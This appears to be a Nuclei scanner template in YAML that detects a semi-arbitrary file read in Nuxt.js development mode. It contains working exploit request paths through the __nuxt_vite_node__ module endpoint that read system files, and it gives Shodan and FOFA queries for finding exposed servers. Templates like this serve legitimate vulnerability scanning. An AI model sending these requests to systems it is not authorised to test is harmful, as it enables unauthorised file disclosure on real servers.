43 lines
1.3 KiB
YAML
43 lines
1.3 KiB
YAML
id: nuxt-js-semi-lfi
|
|
|
|
info:
|
|
name: Semi Arbitrary File Read in Dev Mode - Nuxt.js
|
|
author: DhiyaneshDK
|
|
severity: medium
|
|
description: Arbitrary File Read in Dev Mode in Nuxt.js
|
|
reference:
|
|
- https://huntr.dev/bounties/7840cd32-af15-40cb-a148-7ef3dff4a0c2/
|
|
- https://bryces.io/blog/nuxt3
|
|
- https://twitter.com/fofabot/status/1669339995780558849
|
|
classification:
|
|
cpe: cpe:2.3:a:nuxt:framework:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: "true"
|
|
max-request: 2
|
|
vendor: nuxt
|
|
product: framework
|
|
shodan-query: html:"buildAssetsDir" "nuxt"
|
|
fofa-query: body="buildAssetsDir" && body="__nuxt"
|
|
tags: huntr,lfi,nuxtjs
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/__nuxt_vite_node__/module//bin/passwd"
|
|
- "{{BaseURL}}/__nuxt_vite_node__/module/C:/Windows/System32/calc.exe"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"plugin":'
|
|
- '"pluginCode":'
|
|
- '"id":'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/json"
|
|
# digest: 490a004630440220778502e4a7a554cce789642500efa5453fb11a56f8f822777fe18d38b3ee778d0220299c3d489f030ab69079aaa2a062f6f817b679fad62ed91a30b92e0d4d2e087e:922c64590222798bb761d5b6d8e72950 |